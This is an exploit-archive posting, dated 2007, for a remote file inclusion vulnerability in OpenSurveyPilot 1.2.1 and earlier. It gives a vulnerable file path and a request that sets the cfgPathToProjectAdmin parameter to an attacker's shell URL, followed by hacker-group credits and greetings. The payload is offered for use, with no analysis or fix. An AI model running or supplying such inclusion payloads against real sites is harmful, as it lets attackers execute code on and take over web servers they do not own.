OpenSurveyPilot <= 1.2.1 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OpenSurveyPilot <= 1.2.1 Remote File Inclusion Vulnerability
# Published : 2007-04-18
# Author : Alkomandoz Hacker
# Previous Title : Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln
# Next Title : Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion Vulnerability

# osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities

# D.Script: http://nlcac.internationalstudents.asn.au/osp1.01RC1.tar
			http://sourceforge.net/projects/osp/ << latest
			
# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net & TrYaG.CoM & MoHaNdKo.CoM

# Exploit:

[Path]/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=Shell

-----------------------

----  Thanx: [KaBaRa.hAcK.eGy] [Mahmood_ali] [3theaby Gheer] [Dr.aSiEr H@Ck]
                [ AsB-MaY GrOuPs ] [ Cold-Zero ] [ No4Hard ] [ MoHaNdKo ]

---- GreeTz: All www.Asb-May.bet & WwW.MoHaNdKo.CoM & WwW.TrYaG.CoM

# www.Syue.com [2007-04-18]